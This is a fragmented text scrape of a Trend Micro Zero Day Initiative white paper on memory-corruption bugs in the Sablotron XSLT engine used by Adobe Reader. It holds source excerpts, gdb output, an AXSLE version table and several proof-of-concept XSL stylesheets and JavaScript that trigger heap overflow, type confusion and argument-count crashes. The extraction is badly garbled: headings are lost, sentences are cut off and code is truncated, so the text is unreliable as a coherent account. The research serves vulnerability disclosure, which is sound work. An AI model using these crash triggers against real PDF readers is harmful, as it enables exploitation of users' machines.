A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2...

A Trend Micro White Paper | May 2017

>>


of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications

................................................................................................................................................... 4

............................................................................................................ 4

..................................................................................................... 4

..................................................................... 6

....................................................................... 6

................................................................................................................................ 7

................................................................................................................................. 7

................................................................................................. 16

.................................................................... 16

................................................................................................. 22

...................................................................................... 26

...................................................................................... 32

............................................................................................... 39

.......................................................................................... 44

.................................................................................................................................... 46

WRITTEN BY:

Brian Gorenc, Abdul-Aziz Hariri, and Jasiel Spelman of the Trend Micro

Zero Day Initiative



xsl:choose

xsl:attribute

xsl:copy

xsl:copy-of

Node-Set

String

Boolean

Number

<?xml version="1.0" encoding="UTF-8"?>

<catalog>

<cd>

<title>Empire Burlesque</title>

<artist>Bob Dylan</artist>

<country>USA</country>

<company>Columbia</company>

<price>10.90</price>

<year>1985</year>

</cd>

<cd>

<title>Hide your heart</title>

<artist>Bonnie Tyler</artist>

<country>UK</country>

<company>CBS Records</company>

<price>9.90</price>

<year>1988</year>

</cd>

<cd>

</catalog>



<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet version="1.0"

xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">

<html>

<body>

<h2>My CD Collection</h2>

<table border="1">

<tr bgcolor="#9acd32">

<th style="text-align:left">Title</th>

<th style="text-align:left">Artist</th>

</tr>

<xsl:for-each select="catalog/cd">

<tr>

<td><xsl:value-of select="title"/></td>

<td><xsl:value-of select="artist"/></td>

</tr>

</xsl:for-each>

</table>

</body>

</html>

</xsl:template>

</xsl:stylesheet>



var xmlDoc = "<x/>";

var xslDoc = "<xsl:stylesheet

xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"

version=\"1.0\"> <xsl:template match=\"/\"> <xsl:for-each

select=\"a\">

<xsl:sort select=\"(/)/*[a()]\"/>

</xsl:for-each> </xsl:template></xsl:stylesheet>";

var x = XMLData.parse(xmlDoc, false);

var oNode = x.nodes.item(0);

oNode.applyXSL(xslDoc);



base.h enum

enum XSL_OP

{

XSL_APPLY_IMPORTS, XSL_APPLY_TEMPLATES,

XSL_ATTRIBUTE, XSL_ATTRIBUTE_SET,

XSL_CALL_TEMPLATE, XSL_CHOOSE,

XSL_COMMENT, XSL_COPY, XSL_COPY_OF,

XSL_DECIMAL_FORMAT, XSL_ELEMENT,

XSL_FALLBACK, XSL_FOR_EACH,

XSL_IF, XSL_IMPORT,

XSL_INCLUDE, XSL_KEY,

XSL_MESSAGE, XSL_NAMESPACE_ALIAS,

XSL_NUMBER, XSL_OTHERWISE,

XSL_OUTPUT, XSL_PARAM,

XSL_PRESERVE_SPACE, XSL_PROCESSING_INSTR,

XSL_SORT, XSL_STRIP_SPACE,

XSL_STYLESHEET, XSL_TEMPLATE,

XSL_TEXT, XSL_TRANSFORM,

XSL_VALUE_OF, XSL_VARIABLE,

XSL_WHEN, XSL_WITH_PARAM,

XSL_NONE



};

XSLElement

class XSLElement : public Element

{

public:

XSLElement(Tree& owner_, QName&, XSL_OP);

virtual eFlag execute(Sit S, Context *c, Bool resolvingGlobals);

virtual eFlag newChild(Sit S, Vertex*);

eFlag checkToplevel(Sit S);

virtual eFlag checkChildren(Sit S);

void checkExtraChildren(int& k);

Expression* getAttExpr(XSL_ATT);

virtual int strip();

XSL_OP op;

eFlag checkAtts(Sit S);

private:

eFlag makeSortDefs(Sit S, SortDefList &sortDefs, Context *c);

eFlag make1SortDef(Sit S, SortDef *&def, Context *c);

};

XSLElement::execute

expr.h

expr.cpp Expression::callFunc

Expression::callFunc

case EXFF_LAST:

{

checkArgsCount(0);

retxpr.setAtom( Number(c -> getSize()) );

}; break;

case EXFF_POSITION:

{

checkArgsCount(0);

retxpr.setAtom( Number(c -> getPosition() + 1) );

}; break;

case EXFF_COUNT:

{

checkArgsCount(1);

checkIsNodeset(0);

retxpr.setAtom(

Number(atoms[0] -> tonodesetRef().getSize()) );

}; break;

datastr.h



FuncInfoItem

Expression::callFunc FuncInfoItem



xslOpNames

&forward-compatible

with-param CT_CHANGE



CT_CHANGE

namerTable

namerTable



isNamer

namerTable

namerTable isNamer

Tokenizer::tryShort isNamer

isNamer



Tokenizer::tryShort



utf8.h utf8.cpp

utf8ToUtf16

XSLElement::execute

eFlag XSLElement::execute(Sit S, Context *c, Bool resolvingGlobals)

{

Attribute *a;

Bool didNotExecute = FALSE;

Processor *proc = NZ(S.getProcessor());

…

case XSL_ATTRIBUTE:

{

QName q;

DStr nameStr;

E( NZ( atts.find(XSLA_NAME) ) -> value(S, nameStr, c) );

if (! isValidQName((char*)nameStr) )

Err1(S, E_INVALID_QNAME, (char*)nameStr);

isValueQName isValidNCName

Bool isValidQName(const char* name)

{

char *local = NULL;

char *start = NULL;

Bool copy = false;

Bool result = TRUE;

char *colon = (char *)strchr(name, ':');

if (colon)

{

//*colon = '\0';

local = colon + 1;

copy = true;

start = new char[colon - name + 1];

strncpy(start, name, colon - name);

start[colon - name] = '\0';

} else {

start = (char*)name;



}

result = isValidNCName(start) && (local == NULL ||

isValidNCName(local));

//if (colon) *colon = ':';

if (copy) delete start;

return result;

}

isValidNCName utf8ToUtf16

Bool isValidNCName(const char* name)

{

int len = utf8StrLength(name);

if (len == 0) return FALSE;

wchar_t *buff = new wchar_t[len + 1];

utf8ToUtf16(buff, name);

Utf8ToUtf16

&#xE004D utf8StrLength

int utf8StrLength (const char* text)

{

int len;

for (len = 0; *text; len++) {

if (!(*text & 0x80)) text++;

else text += utf8SingleCharLength(text);

}

return len;

}

int utf8ToUtf16(wchar_t *dest, const char *src)

{

unsigned long code;

int len = 0,

thislen;

for (const char *p = src; *p; p += utf8SingleCharLength(p))

{

code = utf8CharCode(p);

if (code < 0x10000UL)

{

*dest = (wchar_t)(code);

thislen = 1;



}

else

{

dest[0] = 0xd7c0U + (code >> 10);

dest[1] = 0xdc00U | code & 0x3ff;

thislen = 2;

};

dest += thislen;

len += thislen;

}

*dest = 0;

return len;

}

xsl:attribute

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

version="1.0">


<xsl:attribute name="AB󠁍DE"/>

</xsl:template>

</xsl:stylesheet>



utf8ToUtf16

utf8ToUtf16



utf8ToUtf16



base.h

#define toV(v) ((Vertex*)v)

#define toNS(v) (cast(NmSpace*,toV(v)))

#define toE(v) (cast(Element*,toV(v)))

#define toX(v) (cast(XSLElement*,toV(v)))

#define toExtension(v) (cast(ExtensionElement*,toV(v)))

#define toA(v) (cast(Attribute*,toV(v)))

#define toText(v) (cast(Text*,toV(v)))

#define toD(v) (cast(Daddy*,toV(v)))

#define toRoot(v) (cast(RootNode*,toV(v)))

#define toComment(v) (cast(Comment*,toV(v)))

#define toPI(v) (cast(ProcInstr*,toV(v)))

EXFF_LANG


case EXFF_LANG:

{

checkArgsCount(1);

checkIsString(0);

// get the argument

Str langQuery;

E( atoms[0] -> tostring(S, langQuery) );

NodeHandle w, att = NULL;

int attCount, i;

const char* langValue = NULL;

for (w = c -> current(); w && !langValue; w = S.dom().getParent(w))

{

// find whether w has an xml:lang attribute

if (!S.domExternal(w)) {

QName searchName;

searchName.setUri(getOwnerTree().unexpand(theXMLNamespace));

searchName.setLocal(getOwnerTree().unexpand("lang"));

int idx = toE(w) -> atts.findNdx(searchName);

toE

#define toE(v) (cast(Element*,toV(v)))

toE

#ifdef _DEBUG

#define cast(TYPE,PTR) (NZ(dynamic_cast<TYPE>(PTR)))

#else

#define cast(TYPE,PTR) ((TYPE) PTR)



#endif

<a>

<abcd/>

</a>


version="1.0">

<xsl:template match="node()">

<xsl:apply-templates select="node()[lang('foo')]"/>

</xsl:template>

</xsl:stylesheet>



__RTDynamicCast

Figure 6 - Patch Details



ExprList

#define checkArgsCount(x) if (atomsNumber != x)\ Err(S,

ET_BAD_ARGS_N);

#define checkArgsCountMax(x) if (atomsNumber > x)\ Err(S,

ET_BAD_ARGS_N);

#define checkArgsCountMin(x) if (atomsNumber < x)\ Err(S,

ET_BAD_ARGS_N);

#define checkArgsCountBetween(x,y) if ((atomsNumber < x) || \

(atomsNumber > y)) Err(S, ET_BAD_ARGS_N);

CheckArgsCount

ExprList ExprList

PList Expressions

ExprList

typedef PList<Expression *> ExprList;

template <class T>

class PList : public List<T>

{

public:

PList(int logBlocksize_ = LIST_SIZE_SMALL);

// free and remove the last pointer

void freelast(Bool);

// free and remove all pointers

void freeall(Bool);

// free and remove the given pointer

void freerm(int, Bool);

};

#define checkArgsCount(x) if (atomsNumber != x)\

Err(S, ET_BAD_ARGS_N);

#define checkArgsCountMax(x) if (atomsNumber > x)\




#define checkArgsCountMin(x) if (atomsNumber < x)\


#define checkArgsCountBetween(x,y) if ((atomsNumber < x) || \

(atomsNumber > y)) Err(S, ET_BAD_ARGS_N);

case EXFF_CONTAINS:

{

checkArgsCount(2); //Check if there's two args

checkIsString2(0,1);

Str a0Str, a1Str;

E( atoms[0] -> tostring(S, a0Str) ); //reference arg1

E( atoms[1] -> tostring(S, a1Str) ); //reference arg1

retxpr.setAtom((Bool) (firstOccurence(

a0Str, a1Str) != -1));

}; break;

EXFF_SUBSTRING_BEFORE

EXFF_SUBSTRING_AFTER

case EXFF_SUBSTRING_BEFORE:

case EXFF_SUBSTRING_AFTER:

{

Str strg;

Str theBigger, theSmaller;

E( atoms[0] -> tostring(S, theBigger) );

E( atoms[1] -> tostring(S, theSmaller) );

checkArgsCount(2);

checkIsString2(0,1);

...


version="1.0">


<xsl:value-of select="substring-after(.)"/>



</xsl:template>

</xsl:stylesheet>

./sabcmd input.xsl input.xml


atomsNumber



atomsNumber atoms

cmp 0x100261A8 tostring



atoms



Expression::eval()

eFlag Expression::eval(Sit S, Expression &retxpr, Context *c, Bool

resolvingGlobals /* = FALSE */){

EXFO_LOCPATH

case EXF_LOCPATH:

case EXFO_UNION:

{

sabassert(c && "context is null!");

newc.assign(c);

E( createContext(S, newc) );

newc.unkeep();

// assign newc directly without copying

retxpr.setAtom((*newc).copy());

newc.del();

}; break;

…

createContext()

eFlag Expression::createContext(Sit S, Context *& c, int baseNdx /* = -1

*/)

case EXF_LOCPATH:

{

E( createLPContext(S, newc, baseNdx) );

newc.unkeep();

}

createLPContextLevel()

eFlag Expression::createLPContextLevel(Sit S,

int stepLevel, int stepsCount, NodeHandle base,

Context &info, Context *theResult)

{

sabassert(functor == EXF_LOCPATH);

int i, j, init,

predsCount = args[stepLevel] -> step -> preds.number(),

lastBad = -1; // last bad predicate, or the step itself

// keep a stack of positions, one for each predicate IN THIS STEP

List<int> reached(predsCount), // serves as position for next pred

totalReached(predsCount); // serves as size for next (bad) pred



// there will be as many dry (size-counting) runs as there are bad

preds

Bool dryRun = TRUE,

quitThisRound = FALSE, quitThisVertex = FALSE;

// i ranges over predicates. Value i==predsCount is the special last

run

for (i = 0; i <= predsCount; i++)

{

if (i == predsCount)

// the last run, not a dry-run

dryRun = FALSE;

// if this is the last run, or if the current pred uses last(),

compute

// the context size

if (!dryRun || args[stepLevel] -> step -> preds[i] -> usesLast)

{

// initialize the size arrays:

// append base values for preds past the last bad one,

// up to this bad one (incl.)

for (init = 0; init <= lastBad; init++)

reached[init] = 0;

for (init = lastBad + 1; init <= i; init++)

{

reached.append(0);

totalReached.append(-1); // -1 just for safety

};

..

} // if bad predicate

} // for, over all preds

return OK;

}

select="A[0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9][0][1

][2][3][4][5][6][7][8][9]"

predsCount

predsCount dryRun

for (init = 0; init <= lastBad; init++)

reached[init] = 0;

for (init = lastBad + 1; init <= i; init++)

{

reached.append(0);

totalReached.append(-1); // -1 just for safety

};

(gdb) p reached

$30 = {_vptr.List = 0xb69e9228 <vtable for List<int>+8>, nItems = 0, block

= 0x0, blocksize = 0, origBlocksize = 1073741824}

(gdb) p/x reached.origBlocksize



$32 = 0x40000000

reached.append(0)

reached

3711 List<int> reached(predsCount), // serves as position for next

pred

3712 totalReached(predsCount); // serves as size for next (bad)

pred

(gdb) s

3735 reached.append(0);

(gdb) s

List<int>::append (this=0xbfffcc20, what=0) at datastr.h:610

if (nItems >= blocksize)

List<int>::append() datastr.h

template <class T>

void List<T>::append(T what)

{

if (nItems >= blocksize)

{

if (block)

grow();

else

{

blocksize = origBlocksize;

block = (T*) claimMemory(blocksize * sizeof(T));

// FIXME: asserting memory request ok

sabassert(block);

}

}

block[nItems++] = what;

};


version="1.0">


<xsl:value-of

select="A[0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9][0][1

][2][3][4][5][6][7][8][9]"/>

</xsl:template>

</xsl:stylesheet>




In order to find the vulnerable function, we’ll need to find createLPContext which in turn calls createLPContextLevel. This function contains two calls to the List constructor:



origBlockSize



guard.h

Expression::createContext newc

EXF_FILTER

case EXF_FILTER:

{

sabassert(baseNdx != -1); // meaningful only for a locpath

NodeHandle wasCurrent = (*newc).getCurrentNode();

E( args[0] -> createContext(S, newc, baseNdx) );

newc.unkeep();

(*newc).setCurrentNode(wasCurrent);

GP( Context ) filteredc;

for (i = 1; i < argsNumber - (int) hasPath; i++)

{

filteredc = new Context(c_orig -> getCurrentNode());

(*newc).reset();

Bool istrue;

int newcNumber = (*newc).getSize();

for (j = 0; j < newcNumber; j++)

{

E(args[i] -> trueFor(S, newc, istrue));

if (istrue)

(*filteredc).append((*newc)[j]);

(*newc).shift();

};

newc.del();

newc = filteredc.keep();

if (!(*newc).getSize()) break;

};

if (hasPath)

{

filteredc.assign(newc);

filteredc = newc; // a patch due to SGI MIPSpro compiler

E( args[argsNumber-1] -> createLPContextSum(S, filteredc,

(*newc).getCurrentNode()) );

newc.del();

newc = filteredc.keep();

}

}

break;

if(hasPath) filteredc newc

filteredc newc



createLPContextSum createLPContextSum

createLPContext createLPContextLevel

createLPContextLevel trueFor

Expression::trueFor eval

eval EXFOTHERFUNC Err1

Err1 report() NOT_OK

newc filteredc

Expression::createContext

Err1


version="1.0">


<xsl:for-each select="a">

<xsl:sort select="(/)/*[a()]"/>

</xsl:for-each>

</xsl:template>

</xsl:stylesheet>




When looking at the version number for AXSLE.dll compared to the version numbers for Adobe Reader, it becomes

apparent that Reader numbers increment at a different rate than AXSLE. It is hypothesized that the only changes to the

AXSLE version occur due to security fixes. No new functionality is seen in the AXSLE versions that increment even

throughout major version changes to Reader.

Adobe Reader-Major Version Minor Version AXSLE Version

9 9.0.0 3.4.102.1

9.1.0 3.4.102.1

9.1.1 3.4.102.1 9.1.2 3.4.102.1 9.1.3 3.4.102.1

9.2 3.4.102.1 9.3 3.4.102.1

9.3.1 3.4.102.1 9.3.2 3.4.102.1

9.3.3 3.4.102.1

9.3.4 3.4.102.1 9.4.0 3.4.102.1

9.4.1 3.4.102.1 9.4.2 3.4.102.1 9.4.3 3.4.102.1

9.4.4 3.4.102.1 9.4.5 3.4.102.1

9.4.6 3.4.102.1 9.4.7 3.4.102.1 9.5 3.4.102.1

9.5.1 3.4.102.1 9.5.2 3.4.502.1

9.5.3 3.4.503.1 9.5.4 3.4.503.1 9.5.5 3.4.503.1

10 10.0.0 3.6.102.10630

10.0.1 3.6.102.10630

10.1.0 3.6.102.10630

10.1.1 3.6.102.10630 10.1.2 3.6.102.10630

10.1.3 3.6.102.10630 10.1.4 3.6.502.20973

10.1.5 3.6.502.26194 10.1.6 3.6.502.26194

10.1.7 3.6.502.26194

10.1.8 3.6.502.26194 10.1.9 3.6.502.26194

10.1.10 3.6.502.26194 10.1.11 3.6.502.26194 10.1.12 3.6.502.26194

10.1.13 3.6.502.26194

10.1.14 3.6.502.26194

10.1.15 3.6.502.26194 10.1.16 3.6.502.26194

11 11.0.0 3.7.101.21186



11.0.01 3.7.101.21186 11.0.02 3.7.101.21186

11.0.03 3.7.101.21186

11.0.04 3.7.101.21186

11.0.05 3.7.101.21186 11.0.06 3.7.101.21186

11.0.07 3.7.101.21186 11.0.08 3.7.101.21186 11.0.09 3.7.101.21186

11.0.10 3.7.101.21186

11.0.11 3.7.101.21186

11.0.12 3.7.101.21186 11.0.13 3.7.101.21186 11.0.14 3.7.101.21186

11.0.15 3.7.101.21186 11.0.16 3.7.101.21186

11.0.17 3.7.101.36545 11.0.18 3.7.101.37153 11.0.19 3.7.101.37637

11.0.20 3.7.101.37991

A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2...

Documents

Transcript of A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2...